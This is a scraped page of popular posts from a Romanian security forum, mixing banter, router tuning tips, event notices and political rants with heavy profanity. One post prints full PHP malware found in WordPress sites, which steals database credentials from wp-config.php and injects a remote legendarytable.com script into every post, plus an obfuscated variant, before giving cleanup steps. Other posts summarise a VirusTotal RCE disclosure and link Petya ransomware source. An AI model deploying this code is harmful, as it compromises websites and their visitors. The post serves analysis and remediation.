Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation since 10/07/21 in all areas

  1. Salut. Am gasit doua vulnerabilitati XSS in aplicatiile detinute de cei de la Microsoft. Una este in Outlook, iar a doua intr-o alta aplicatie folosita si cunoscuta de multi... nu pot da detalii momentan deoarece nu a fost rezolvata nici una pana acum... Cel putin, nu am primit duplicat pe rapoartele trimise. ­čÖé 1. XSS reflected (without user interaction) - [*].live.com: 2. XSS reflected (user interaction required) - Outlook: Am observat ca si domeniile acestea sunt vulnerabile: office365.com si live.com.
    10 points
  2. Am blocat anumite clase de IP-uri pentru acces. Va las pe voi sa va dati seama care.
    9 points
  3. After a deep security research by Cysource research team led by Shai Alfasi & Marlon Fabiano da Silva, we found a way to execute commands remotely within VirusTotal platform and gain access to its various scans capabilities. About virustotal: The virustotal.com application has more than 70 antivirus scanners that scan files and URLs sent by users. The original idea of the exploration was to use the CVE-2021-22204 so that these scanners would execute the payload as soon as the exiftool was executed. Technical part: The first step was uploading a djvu file to the page https://www.virustotal.com/gui/ with the payload: Virustotal.com analyzed my file and none of the antiviruses detected the payload added to the file's metadata. According to the documentation at the link: https://support.virustotal.com/hc/en-us/articles/115002126889-How-it-works , virustotal.com uses several scans. The application sent our file with the payload to several hosts to perform the scan. On virustotal hosts, at the time that exiftool is executed, according to CVE-2021-22204 inform, instead of exiftool detecting the metadata of the file it executes our payload. Handing us a reverse shell on our machine. After that we noticed that itÔÇÖs not just a Google-controlled environment, but environments related to internal scanners and partners that assist in the virustotal project. In the tests it was possible to gain access to more than 50 internal hosts with high privileges. Hosts identified within the internal network: The interesting part is every time we uploaded a file with a new hash containing a new payload, virustotal forwarded the payload to other hosts. So, not just we had a RCE, but also it was forwarded by Google's servers to Google's internal network, it customers and partners. Various types of services were found within the networks, such as: mysql, Kubernetes, oracle database, http and https applications, metrics applications, SSH, etc. Due to this unauthorized access, it was possible to obtain sensitive and critical information such as: Kubernetes tokens and certificates, service settings info, source codes, Logs, etc. We reported all the findings to Google that fixed this issue quickly. Disclosure Process: Report received by GoogleVRP - 04.30.2021 GoogleVRP trigged the report - 05.19.2021 GoogleVRP accepted the report as a valid report - 21.05.2021 GoogleVRP closed the report - 04.06.2021 Virustotal was no longer vulnerable - 13.01.2022 GoogleVRP allowed publishing - 15.01.2022 Source: https://www.cysrc.com/blog/virus-total-blog
    8 points
  4. Cum n-am mai deschis un topic aici de multi ani, si am terminat serialele, si n-am somn, m-am gandit sa impartasesc cu voi optimizarile ce le folosesc pentru a imbunatati timpul de raspuns si viteza internetului. Este vorba de setari si configurari ce se aplica routerului, si este necesar ca routerul sa va permita conectarea prin ssh ca root pentru a le aplica. Eu folosesc https://www.synology.com/en-us/products/RT2600ac dar sunt convins ca ca sunt si alti producatori ce au routere cu linux destul de accesibil pentru a implementa optimizarile. Stiu nu e AX, luna viitoare scot cei de la Synology unul AX. Oricum tutorialul se aplica la fel si la AX si AC. Cand apare wifi 6e in Romania, poate fac o continuare. La routerele Synology parola setata la userul Admin, este parola de root. Valorile ce le gasiti in continuare au fost optimizate pentru o viteza maxima permisa de isp de 940Mbps, dar pana la 2.5Gbps nu ar trebui sa fie necesare modificari semnificative. De asemenea puteti aplica aceste setari si pe servere linux vor aduca imbunatatiri semnificative fata de default. 1. /etc/rc.local Este posibil sa nu functioneze configurarile exact asa cum le prezint eu aici pe routerul vostru, de aceeea inainte de a le scrie in fisiere pentru a deveni persistente, faceti setarile la run-time, si adaptatiile daca este necesar, sau omitetile daca nu se aplica la voi (nu aveti binarele respective/variabilele de kernel, ajustati caila catre ele) 2. /etc/sysctl.conf Ca sa aplicati configurarile fara reboot folositi sysctl -p, sau sysctl -w nume_variabila=valoare. Indepartati variabilele daca primiti eroare, unele pot sa lipseasca din versiunea de kernel pe care o aveti. 3. Wifi Alegem canalul: Primul pas este scanarea de spectru, sunt multe aplicatii pentru asta, scopul este sa identificati canalul cel mai putin folosit pe 2.4/5Ghz sau daca este folosit retelele ce emit pe acel canal sa aiba o putere cat mai mica. - pe 2.4Ghz sunt 3 canale ce nu se suprapun (non overlapping channels), 1, 6 si 11, ideal este sa alegem unul dintre acestea. Daca toate sunt libere, alegeti 11. - pe 5Ghz, cautam sa ne ferim de canalele cu DFS obligatoriu, astfel ne orientam catre benziile U-NII-1 si U-NII-3, daca avem noroc sa locuim in US/Canada (sau routerul crede asta), as recomanda canalul 161. Dar cum locuim in Romania si e 5000 lei amenda daca setezi alta tara si mergi pe un canal aiurea (in ideea in care avem vreo UM in apropiere, bruiem ceva, ei fac sesizare la ANCOM si ne bate ANCOM la usa, putin probabil), iar routerul nu ne lasa sa folosim 161 pe Romania, m-as uita la 40-44, daca este liber. Daca ai un router capabil, si intamplator locuiesti in Australia, routerul iti va permite 4W puterea in U-NII-3, cea mai mare din lume acceptata pe wifi, dar majoritatea routerelor suporta ┬▒1W maxim. Channel width: Marimea canalului este importanta, cu cat este mai mare, cu atat incap mai multe date, deci avem viteza mai mare. - pe 2.4Ghz, eu merg pe width de 40Mhz - pe 5Ghz, routerul meu stie sa mearga pe un width de 80+80 Mhz, practic foloseste 2 canale, am ales un canal din U-NII-1 si unul U-NII-3 (cand locuiam in US), ambele cu un width de 80Mhz, bine si deviceurile din caza trebuie sa stie 80+80 Mhz, sau 160Mhz, cel mai probabil suporta doar 80Mhz, ceea ce e good enough oricum. Alte setari: DTIM 4 - mai mic scade viteza si timpul de raspuns, si se consuma mai multa baterie, mai mare e opusul, optimul este 4. Dar puteti face A/B testing si vedeti ce vi se potriveste mai bine. Multicast translation - on AMPDU - on EXTENDED NSS - on U-APSD - off MU-MIMO - on, ideal 4x4, dar si 2x2 ar trebui sa fie suficient. PMF support - off, apare un overhead ciudat si pare buggy, daca la voi se comporta la fel si on si off, e o idee buna sa ii dati on. La fel si WPA 3. IGMP Snooping - on Orice setare de power saving, off! Downgrade usb 3.0 device to reduce interference to 2.4 Ghz signal - on Allow auto-switch to DFS channels - off WPS - off (security) Daca routerul suporta guest, si nu folositi reteaua in mod curent, opriti guest. La criptarea retelei alegeti AES, pentru ca e hw accelerated. Alegeti pe 2.4Ghz N only, si 5Ghz AC/AX only, ca sa va asigurati ca fortati device-urile sa folosesca cele mai rapide protocoale de wifi, daca sunt device ce nu functioneza corect reveniti la o setare mai permisiva. Daca routerul suporta 802.11v aka Smart Connect, puteti, si recomand, sa folositi acelasi nume si la 2.4Ghz si la 5Ghz si routerul va negocia protocolul cel mai bun suportat de device, tinand cont si de calitatea semnalului pentru a avea cea mai buna acoperire si un plus de simplitate. + Folositi un doh dns, daca suporta routerul, sau macar un cloudflare dns, are datacenter si la otopeni si peers locale - https://1.1.1.1/dns/ . Firewall: Mtu probing se foloseste de icmp (ping), pentru a identifica valoarea optima, astfel este important sa acceptati icmp pe ipv4 si ipv6. Blocati orice port ce nu are ce cauta in afara, eu de exemplu, prefer sa folosesc un port non-default pentru vpn server, din care mai apoi sa am access la interfata routerului si alte chestii. Locatia fizica: Recomand sa identificati locul de unde, din pozitia routerului puteti vedea usile la toate camerele (sau cat mai multe), un hol, sa va asigurati ca nu sunt obstacole (pereti mai ales de beton, frigider, etc..) in jurul routerului, este ideal sa fie situat la o inaltime de 2m, prins pe perete (preferabil), daca folositi wifi cu precadere dintr-o anumita camera cautati o pozitie cat mai aproape de camera care sa respecte cele de mai sus. Daca pui routerul sub pat, de sub pat o sa ai putere maxima :))). Este adevarat ca semnalul ocoleste/trece prin obstacole doar ca fiecare obstacol scade semnificativ puterea, daca punem routerul pe jos, in mod automat va intalni semnificativ mai multe obstacole, si daca prin dreptul lui trec persoane, o sa apara spike-uri, nu ne dorim asta, de aceea inaltimea de 2m este optima. Performante obtinute: Inainte de a face aceste optimizari aveam 300-400 mbps, cu spike-uri mari. Dupa, am 650-666 pe orice device Apple mai nou de 2019 (testat cu: iPhone X, 12, MacBook Pro 16'' M1 pro/M1 max), si 800-900 Mbps pe deviceuri Apple 2017-2019 (chiar 2014) (testat cu: MacBook Pro 16'' 2014, 2019, Intel-based), au pus placi de retea mai slabe pe 5Ghz cu 2/mimo in loc de 3 cum era pana in 2019 pe device recente, probabil ca sa faca o economie de baterie/de cost de productie, naiba stie. https://support.apple.com/ro-ro/guide/deployment/dep2ac3e3b51/web Cert este ca routerul duce mai mult decat deviceurile ce le folosesc. Daca routerul este capabil AX la 2 mimo atat pe partea de router cat si de client estimez o viteza de 750-800Mbps, ceea ce e destul de bine. Update, screenshoot facut din qbittorrent, de pe un MBP M1 Pro, pe WIFI: Sper sa va fie de folos! Have fun! PS: daca am facut vreo greseala, o sa o corectez zilele urmatoare, am inceput sa scriu la 23 si e 03
    8 points
  5. Consumati curent, poluati si ucideti balenele si ursii polari. Huooo, pacatosilor ­čĄú
    8 points
  6. Da, e vorba de jreister de aici - https://rstforums.com/forum/profile/228593-jreister/ Nu era niciun hacker. Facuse ceva infractiuni in trecut si incerca sa-si faca si el un rost. Facea site-uri diverse pe la firme "un t├ón─âr din Bac─âu, specializat ├«n infrac╚Ťiuni informatice." - muie presa si mamele lor specializate in blowjob de pseudo-ziaristi de cacat
    8 points
  7. Adevarat, intr-o zi erau 3000+ in alta 11.000+. Cred ca RST a avut "atacuri mult mai grele" si cu iptables -j DROP s-au rezolvat instant. Sa vorbeasca cu cei care se ocupa de hosting-ul emag si alte servicii de Black Friday
    7 points
  8. 7 points
  9. Sunt vaccinat si nu am patit nimic. M-am vaccinat deoarece am decompilat vaccinul in IDA Pro si am vazut ce contine. Deschide un port pentru bere si ruleaza un shellcode obfuscat pentru dorinta de a bea. Din analiza statica heuristica realizata peste ARN-ul mesager putem banui ca firma Corona se afla in spatele acestui vaccin.
    7 points
  10. Eu am dezvoltat un bruteforcer cuantic care ruleaza pe blockchain si foloseste artificial intelligence ca sa obtina acces la servere de pe glob. E privat. Din fericire nu trebuie compilat, e scris in PHP.
    7 points
  11. Am crezut ca e reclama la bitdefender ­čĄú deci concluzia e ca tot ce se intampla rau pe lumea asta se trage de la rusi. Ai naiba, de scarbele de americani nu zice nimeni nimic. Intreaga europa a devenit o colonie lingatoare de gaoaze americane
    6 points
  12. Surely youÔÇÖve been expecting our email about the DefCamp conference, right? We are happy to officially announce that weÔÇÖre back with DefCamp - the offline edition, this fall, as we've become accustomed to over the last 10 years. Registrations are NOW OPEN, which means you can book your early bird ticket right now! Ready, steady, gooooo pack your bags and cyber knowledge for #DefCamp12! https://def.camp/tickets/ WHEN: 10th-11th November, 2022 WHERE: Bucharest, Romania Call for papers: https://def.camp/call-for-papers/ Call for contsts: https://def.camp/call-for-contests/ Become a volunteer: https://def.camp/become-a-volunteer/ Website: https://def.camp/
    6 points
  13. O poveste interesanta de citit despre cum am reusit sa avem acces la banii tuturor la cel mai mare Hackathon din Europa de Sud-Est;) https://medium.com/@kelyany/how-we-managed-to-hack-the-biggest-southeast-europe-hackathon-8ac658774af6
    6 points
  14. De-a lungul timpului am observat foarte des intrebarea: ÔÇťCum sa incep cu domeniul security?ÔÇŁ. Exista atat persoane la inceput de drum care isi doresc o cariera pe aceasta cale cat si persoane cu experienta in domeniul IT dornice sa inteleaga ce presupune acest domeniu. Voi incerca sa raspund acestei intrebari din perspectiva personala, oferind sugestii celor care nu stiu cu ce sa inceapa si cum sa porneasca pe acest drum.
    6 points
  15. Salut, cred ca te pripesti putin pentru o (alta?) pasiune. Tu vrei "un game evaluator asemenator cu cel al chess.com DAR MAI SMECHER". Chess.com e o companie cu peste 200 de angajati si peste 14 ani vechime! Nu e ceva ce se poate face intre un crawler de anunturi si o tema de Wordpress, pe cateva sute de euro. Inca ceva, de pe github-ul lichess: Iti trebuie dezvoltare cu programatori si testeri care sunt si pasionati/experti in sah si stiu cu ce se mananca stack-ul asta. Nu e stack-ul clasic de carpeala cu PHP si MySQL in spate. Cum am zis si mai sus, cei 200+ angajati ai companiei te pot contrazice... Nu pare un proiect care sa merite, mai ales pentru o pasiune din care nu vrei sa scoti bani. Parerea mea. Tot ce am zis mai sus presupune ca vrei ceva functional si calitativ. Daca vrei o carpeala, sunt sigur ca gasesti pe cineva pentru cateva mii de euro.
    6 points
  16. Sosoaca si HAUR. Cam ce poti schimba tara de prosti si nesimtiti? Din vina politicienilor sunt romanii asa: - Arunca chistocu pe jos - Isi lasa peturile de bere si ambalajele de mici la padure - Scuipa pe jos si sparg seminte - Sunt nesimtiti si oligofreni. Le explici ca ciuma rosie a fost si e un cancer si ei continua sa voteze psd. (aviz pensionarilor) - Vor un presedinte romulan, sa apara la capatos si maruta, sa rada cu ei - Traiesc din ajutoare sociale. E prea mica diferenta dintre salariul minim si ajutorul social - Se vaita permanent, scarpinandu-se la maciuca Fac pariu ca multi nici nu stiu ce atributii are un presedinte. Probabil multi se asteapta sa vina primaria si sa le faca curat in curte
    6 points
  17. @Dragos esti amuzant cu GDPR-ul. Nicio institutie din Romania nu respecta GDPR. Nici macar Autoritatea Na╚Ťional─â de Supraveghere a Prelucr─ârii Datelor cu Caracter Personal. Mai mult decat atat, au cumetrii si protejeaza tiganii care fac spam si au contracte cu institutiile statului roman ticalos si preacurvit. Tot ce se fura in mod scarbavnic in tara lui peste prajit in ulei de motor, se face cu sprijinul SRI. Aia asa, pe langa afacerile de pe aeroport si matraseniile cu bagarea pumnlului in gura diversilor operator economici pentru a facilita manarelile altora. Stiati ca intai se fac interceptari si apoi se obtin ordine judecatoresti? Dar ca intregul sistem de justitie e corupt precum curvele ce sug pula prin cabinele telefonice? Judecatorii au gramada de dosare penale facute si sunt amenintati ca intra pe rol daca nu dau verdictele dorite. 33 de ani de hotie si labageala. Bataie de joc pe banul public. Ca tot a venit vorba de comunicatii. Unde pula mea e site-ul MCSI.RO ? S-au dat 63.000 de euro unei firme cu activitatea inghetata sa puna online o pula cu urechi facuta in joomla. A stat online 4 luni, apoi au mai dat inca 30.000 de euro pentru refacerea lui. Au abandonat la scurt timp proiectul si au redirectat catre site-ul oficial din laba, comunicatii.gov.ro. Asta are certificatul SSL expirat din 21 mai 2021. Sat fara caini si curve proaste pe posturi bine platite. Aia e romania coaie. Treziti-va si plecati de acolo cat mai puteti inca. S-a intors Inchizitia
    6 points
  18. Inainte de asta (MRRST - Marea Revitalizare RST), eu sunt uimit ca ai reusit sa faci o fraza de 282 cuvinte fara sa pui un punct. Mai mai sa raman fara aer cand am citit ce-ai scris.
    6 points
  19. Hai în Echipa PSD
    6 points
  20. Salut! Impreuna cu echipa de robotica a scolii si inca cativa prieteni am decis sa facem un CTF. CTF-ul este destinat tuturor elevilor si studentilor din Romania care sunt pasionati sau doresc sa invete despre domeniul securitatii cibernetice intr-un mod gamificat. Avem challenge-uri unice si de diferite grade de dificultate pentru ca toata lumea sa se bucure de CTF. Mai multe detalii gasiti in postarea de pe instagram: https://www.instagram.com/p/CW0MGEwoLLn/ Site inscriere: https://abso-tech.eu/ Discord: https://discord.gg/7NuPEnfs
    6 points
  21. Bro, la tine deschide direct socket :))))))
    6 points
  22. Vulnerabilitatea din [*].live.com. Azi am primit mesaj. Nu ma asteptam asa repede la un raspuns. ­čÖé L.E: Au si reparat-o... LOL. Am verificat acum ­čśů
    5 points
  23. asta e bagpulist care nu da limbi femeii. D'aia se duce dom'le dupa altii ­čĄú
    5 points
  24. requests.get("rstforumzz/user/jsprq").find_location().cplm_o_fi_facut_si_asta().hai_sa_l_arestam_just_in_case()
    5 points
  25. https://medium.com/@kelyany/hunting-the-hackers-for-fun-using-a-honeypot-df928685324a https://justpaste.it/81pqq Zilele astea m-am jucat cu un honeypot ca sa pot analiza comportamentul atacatorilor si sa inteleg mai bine partea de blue team. As da copy paste la post direct aici dar se aranjeaza foarte aiurea:) Las link-ul de pe medium iar pentru cei care nu au cont un link separat
    5 points
  26. Isi facea si omul un backlink cinstit. Backlinkul neprins e negustor cinstit. :)))))
    5 points
  27. Frecventa nu se poate schimba, cam toate dispositivele de genul functioneaza pe 433Mhz (porti garaj, chei masina, jaluzele/ferestre electrice) ce se poate schimba uneori e codul de access. (depinde de model) Unele modele au coduri de access setate cu un dip switch Altele au un buton de "sincronizare" care daca il apesi si pe cheie si pe usa se 'imperecheaza'. Depinde foarte mult de modelul de transmitator, daca poate sa 'uite' o cheie. Sau sa inregistreze o cheie noua. E: cauta manualul de la firma/dispozitivul/modelul tau si vezi daca zice ceva despre coduri access, inregistrare de chei noi, etc.
    5 points
  28. Sa se faca temele de catre elev. Data fiind tema T la informatica, sa se calculeze de catre elevul E, ca de aia s-a dat tema nu ca sa se milogeasca pe forumul F. PS: Ce e aia progresie geometrica? https://ro.wikipedia.org/wiki/Progresie_geometric─â a[i] = a[i-1]*p Cum sa calzulezi+afisezi? Poti sa o iei cu un for pentru(i de la 0 la n){ int termen_curent = termen_anterior*p; afiseaza(termen_curent); termen_anterior=termen_curent; } poti sa o iei recursiv
    5 points
  29. E de la pluginul "Elementor" Aici este sursa ce "infesteaza" jucariile: <?php error_reporting(0); ini_set('display_errors', 0); ini_set('max_execution_time', 0); echo "ssqqss>>>"; $d = $_SERVER['DOCUMENT_ROOT'] . "/"; $files = array(); for ($i = 0;$i < 3;$i++) { try { $az = shell_exec('find ' . $d . ' -name "wp-config.php"'); $az2 = explode("\n", $az); foreach ($az2 as $file) { $fil = explode("/wp-config.php", $file); $fil = $fil[0] . "/wp-config.php"; array_push($files, $fil); } $d = $d . "../"; } catch(Exception $e) { } } $l = "/"; for ($i = 0;$i < 3;$i++) { try { $it = new RecursiveDirectoryIterator($_SERVER['DOCUMENT_ROOT'] . $l); $display = Array( 'php' ); $search = Array( 'wp-config.php' ); $files_ar = array(); foreach (new RecursiveIteratorIterator($it) as $file) { if (strpos($file->getFilename() , 'wp-config.php') !== false) { array_push($files, $file->getPathname()); } } $l .= "../"; } catch(Exception $e) { } } $files = array_unique($files); foreach ($files as $file) { make_index_blog($file); } die(); function get_var_reg($pat, $text) { if ($c = preg_match_all("/" . $pat . "/is", $text, $matches)) { return $matches[1][0]; } return ""; } function getijstonemoretime($path) { } function make_index_blog($path) { echo "iii->>try:" . $path . "<br />"; $az = shell_exec('cat ' . $path); if (strpos($az, "DB_PASSWORD") !== false) { } else { } if (strpos($az, "DB_PASSWORD") !== false) { sqldo($az); } } function sqldo($content) { $siteurl = "null"; if (strpos($content, "DB_NAME") !== false) { $db = get_var_reg("DB_NAME['|\"].*?,.*?['|\"](.*?)['|\"]", $content); $host = get_var_reg("DB_HOST['|\"].*?,.*?['|\"](.*?)['|\"]", $content); $user = get_var_reg("DB_USER['|\"].*?,.*?['|\"](.*?)['|\"]", $content); $pass = get_var_reg("DB_PASSWORD['|\"].*?,.*?['|\"](.*?)['|\"]", $content); $conn = new mysqli($host, $user, $pass); if ($conn->connect_error) { echo $conn->connect_error; } else { $q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%options%'"; $result = $conn->query($q) or die($conn->error); while ($row = $result->fetch_assoc()) { $result5 = $conn->query("SHOW COLUMNS FROM " . $db . "." . $row["TABLE_NAME"] . " LIKE 'option_name'"); if ($result5->num_rows > 0) { $q2 = "SELECT option_value FROM " . $row["TABLE_SCHEMA"] . "." . $row["TABLE_NAME"] . " where option_name='siteurl' LIMIT 1 "; $result2 = $conn->query($q2) or var_dump($conn->error); while ($row2 = $result2->fetch_assoc()) { $val = $row2['option_value']; $siteurl = $val; echo "iii->>find222:" . $siteurl . "<br />"; if (strpos($siteurl, "://") !== false) { $k = file_get_contents($siteurl); if (strpos($k, "legendarytable") !== false) { echo "iii->>contains:" . $siteurl . "<br />"; } else { $q9 = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%posts%'"; $result9 = $conn->query($q9) or die($conn->error); while ($row9 = $result9->fetch_assoc()) { $q8 = "SELECT post_content FROM " . $row9["TABLE_SCHEMA"] . "." . $row9["TABLE_NAME"] . " LIMIT 1 "; $result8 = $conn->query($q8) or var_dump($conn->error); while ($row8 = $result8->fetch_assoc()) { $val8 = $row8['post_content']; if (strpos($val8, "legendarytable") === false) { $q3 = "UPDATE " . $row9["TABLE_SCHEMA"] . "." . $row9["TABLE_NAME"] . " set post_content = CONCAT(post_content,\"<script src='https://jack.legendarytable.com/news.js?v=1.9.9' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%legendarytable%'"; $conn->query($q3); echo "iii->>" . $row9["TABLE_SCHEMA"] . "." . $row9["TABLE_NAME"] . "<br />"; } else { echo "iii->>222ALREADY:" . $row9["TABLE_SCHEMA"] . "." . $row9["TABLE_NAME"] . "<br />"; } } } } } } } } } $conn->close(); } return $siteurl; } function search_file_index($dir, $file_to_search) { $files = @scandir($dir); if ($files == false) { $dir = substr($dir, 0, -3); if (strpos($dir, '../') !== false) { search_file_index($dir, $file_to_search); return; } if ($dir == $_SERVER['DOCUMENT_ROOT'] . "/") { search_file_index($dir, $file_to_search); return; } } foreach ($files as $key => $value) { $path = realpath($dir . DIRECTORY_SEPARATOR . $value); if (!is_dir($path)) { if (strpos($value, $file_to_search) !== false && (strpos($value, ".ph") !== false || strpos($value, ".htm")) !== false) { make_index_upload($path); } } else if ($value != "." && $value != "..") { search_file_index($path, $file_to_search); } } } Prin fisiere, o alta versiune (cea cu cookie check) arata asa: $v=chr(112).chr(114).chr(101).chr(103).chr(95).chr(109).chr(97).chr(116).chr(99).chr(104); if(!$v(chr(35).chr(119).chr(111).chr(114).chr(100).chr(112).chr(114).chr(101).chr(115).chr(115).chr(95).chr(97).chr(100).chr(109).chr(105).chr(110).chr(124).chr(119).chr(112).chr (45).chr(115).chr(101).chr(116).chr(116).chr(105).chr(110).chr(103).chr(115).chr(124).chr(119).chr(111).chr(114).chr(100).chr(112).chr(114).chr(101).chr(115).chr(115).chr(95).chr (108).chr(111).chr(103).chr(103).chr(101).chr(100).chr(35).chr(105),implode(" ",array_keys($_COOKIE)))){echo chr(60).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(32). chr(115).chr(114).chr(99).chr(61).chr(39).chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(116).chr(114).chr(105).chr(99).chr(107).chr(46).chr(108).chr(10 1).chr(103).chr(101).chr(110).chr(100).chr(97).chr(114).chr(121).chr(116).chr(97).chr(98).chr(108).chr(101).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(101).chr(119).c hr(115).chr(46).chr(106).chr(115).chr(63).chr(118).chr(61).chr(54).chr(46).chr(51).chr(46).chr(50).chr(39).chr(32).chr(116).chr(121).chr(112).chr(101).chr(61).chr(39).chr(116).ch r(101).chr(120).chr(116).chr(47).chr(106).chr(97).chr(118).chr(97).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(39).chr(62).chr(60).chr(47).chr(115).chr(99).chr(114). chr(105).chr(112).chr(116).chr(62);} Pentru a verifica checksum la fisierele din core, va recomand wp-cli Exemplu: ./wp --allow-root core verify-checksums Warning: File doesn't verify against checksum: wp-login.php Warning: File doesn't verify against checksum: wp-admin/index.php Warning: File doesn't verify against checksum: wp-admin/admin.php Warning: File doesn't verify against checksum: wp-admin/admin-ajax.php Warning: File should not exist: wp-admin/try.php Error: WordPress installation doesn't verify against checksums. Ar trebui sa dea cam asa: ./wp --allow-root core verify-checksums Success: WordPress installation verifies against checksums. Este necesara si eliminarea scripturilor din posts (wp_posts). Se poate identifica foarte usor printr-un query mysql: select * from wp_posts where post_content like '%news.js%'; De asemenea, se poate elimina din wp_posts utilizand replace. Aici vedeti ca pot fi mai multe versiuni. Puteti extinde cautarea dupa %script% sau/si legendarytable si apoi faceti replace la ce e necesar update wp_posts set post_content = replace(post_content, "<script src='https://jack.legendarytable.com/news.js?v=1.9.9' type='text/javascript'></script>", ""); Mai este inca o versiune ce isi instaleaza 2 plugine (inactive) prin care isi pot rula diverse. O alta versiune isi face check la cookies. Acolo unde exista cookies, nu face redirect catre alte site. Vizeaza doar vizitatori noi pe care-i redirecteaza Sfat: 1. Nu mai instalati toate l├ąbile de plugine 2. Folositi in plm Content-Security-Policy! :)))
    5 points
  30. Pai si bugete pentru firmele neamurilor? Ei nu cauta solutii man. Cauta sa ofere contractele si sa mulga bani
    5 points
  31. Oricum sunt inutile site-urile guvernamentale. Poti chiar spune ca sunt site-uri folosite la frauda, la cat va fura statul roman ticalos. ÔÖą´ŞĆ fratii mei rusi!
    5 points
  32. ce ne facem baieti, a picat psd.ro si inca cateva rahaturi de site-uri pe la 7 dimineata, maine poimaine o sa atace si covrigaria luca plm a sunat 1990 isi vor pachetele inapoi
    5 points
  33. Asta e curs cum sa iti ia casa foc. Nu se respecta niciun fel de normativ/standard acolo. E instalatie electrica sau lucreaza la ma-sa la grajd :)))) - Conductorii par de 1,5 mm toti - Sigurantele sunt de 16 AMPERI curba C (pentru consumatori inductivi, nu rezistivi, asa cum avem in casa la majoritatea lucrurilor). Pentru instalatiile domestice se folosesc curba A sau B. E logic, ai curba C pentru ca un consumator inductiv consuma de pana la 6 ori curentul absorbit la pornire (o sa sara siguranta aia la 60 de amperi, atunci cand toata instalatia facuta pe 1.5mm sectiune o sa arda in flacari) - Nu exista niciun fel de siguranta diferentiala - A ocupat mai mult de 70% din cutie cu ele. - Conductorii litati nu se dezizoleaza cu caterul - Este interzisa cositorirea conductorilor in instalatii electrice. Acolo se folosesc cleme speciale de tip wago (prinderea se face mecanic, altfel cositorul acela o sa curga la prima supra sarcina iar suprafata de contact este de ~0,3mm, ori de cate ori l-ar rasuci labarul) - A pus deasupra sarme intre sigurante in loc de busbar (9 sigurante de 16 amperi pe un singur conductor de 1,5mm)
    5 points
  34. Adica s-a rupt receiverul de la tastatura. Microsoft All-In-One este RF (Wireless), nicidecum Bluetooth. Nu iti va functiona cu niciun alt receiver wireless pentru ca vin special facute asa (fiecare dongle functioneaza doar cu tastatura din acel set).
    5 points
  35. Cred ca asta e mot-a-mot cu ce ai tu acolo desi b-ul ala nush de ce nu e float: #include <iostream> #include <cmath> using namespace std; int main() { int n, a, b; cout << "n = "; cin >> n; a = 1; b = 1; while (a*a + b*b <= n) { if (a*a + b*b == n) { cout << "a = "; cin >> a; cout << "b = "; cin >> b; } a += 1; b = sqrt(n - a*a); } cout << "a = " << a << endl; cout << "b = " << b << endl; return 0; } // LE. Sunt platit foarte bine ca sa ajut lumea la teme. That could be you Learn and you'll get rich
    5 points
  36. Executabilul de la Petya Ransomware Rescris de la 0 in C (pentru scop educational). Totul este explicat concret si clar. SC: https://github.com/reservedcloud/Petya2 Codul sursa este licentiat cu GPL 3.0, deci orice schimbare sau publicare a sursei fara credite poate fi data jos printr-un DMCA.
    5 points
  37. Ba da tu te-ai gandit sa faci bani muncind? De cand sunt pe forumu asta numai cu cacaturi d-astea umbli. Ce ai in capu' ala?
    5 points
  38. Vreau si eu sa generez macar 3k dolari pe luna, asa ca hobby.
    5 points
  39. L─ârgirea intercept─ârii comunica╚Ťiilor ÔÇô introdus─â pe ╚Öest de Guvern Posted on: 9 December 2021 By: Bogdan Manolea Un nou articol (ap─ârut din senin ├«ntr-o lege care trebuia s─â reglementeze cu totul altceva) l─ârge╚Öte ├«n mod nejustificat domeniul ╚Öi spectrul intercept─ârii comunica╚Ťiilor electronice, inclusiv a accesului la datele de trafic, date de con╚Ťinut ╚Öi la ÔÇ×con╚Ťinutul comunica╚Ťiilor criptate tranzitateÔÇŁ. Articolul a fost ad─âugat ├«ntr-un proiect de lege adoptat de Guvernul C├ó╚Ťu cu doar 3 zile ├«nainte de a fi demis de Parlament, iar proiectul a trecut de Camera Deputa╚Ťilor f─âr─â niciun amendament contrar. I. Mega-plictis, ce s─â mai. Doar ├«nt├ómplarea face c─â ne-am uitat pe un text juridico-tehnic lung de 300 de pagini pe un text relativ plictisitor, chiar ╚Öi pentru juri╚Öti obi╚Önui╚Ťi cu domeniul telecom. Proiectul de lege pentru transpunerea directivei UE 2018/1972 (Codul european al comunica╚Ťiilor), care de fapt ├«nlocuie╚Öte alte 4 directive, este un mega-proiect legislativ care transpune m─âsuri ├«n mare parte interesante doar pentru cei interesa╚Ťi de domeniul comunica╚Ťiilor electronice ╚Öi de ce face ANCOM. Ministerul Transporturilor ╚Öi Comunica╚Ťiilor a avut proiectul ├«n dezbatere publica ├«nc─â din noiembrie 2020 (inclusiv cu o ├«nt├ólnire online) ╚Öi a inclus ├«n el ╚Öi alte reglementari de interes pentru acela╚Öi domeniu (ceva clarific─âri legea infrastructurii, serviciul My ANCOM) ╚Öi i-au mai dat ╚Öi un nume generic - ÔÇ×Proiectul de Lege pentru modificarea ╚Öi completarea unor acte normative ├«n domeniul comunica╚Ťiilor electronice ╚Öi pentru stabilirea unor m─âsuri de facilitare a dezvolt─ârii re╚Ťelelor de comunica╚Ťii electroniceÔÇŁ. Mega-plictis, ce s─â mai. De╚Öi directiva trebuia transpus─â p├ón─â pe 21 decembrie 2020, a z─âcut undeva prin Guvern aproape un an p├ón─â c├ónd a plecat USR din coali╚Ťie . Apoi, cu doar 3 zile ├«nainte s─â fie demis (coinciden╚Ť─â sau nu?!?), Guvernul C├ó╚Ťu ├«l adopt─â dintr-o dat─â ├«n ultima ╚Öedin╚Ť─â de guvern. Pe urm─â intr─â ├«n circuitul parlamentar, iar la Camera Deputa╚Ťilor trece ca prin br├ónz─â ╚Öi este adoptat pe 7 decembrie 2021. Mega-plictis, ce s─â mai. II. ╚śi diavolul e ├«n 10^2 Doar ca ├«ntre varianta din dezbatere public─â ╚Öi cea adoptat─â de guvern apare o nou─â ad─âugire ├«n motiva╚Ťie numit─â ÔÇ×Schimb─âri legislative relevante pentru domeniul securit─â┼úii na┼úionaleÔÇŁ (sic!), dou─â defini╚Ťii (scrise evident de persoane care nu au lucrat ├«n domeniu, dup─â formul─ârile absolut 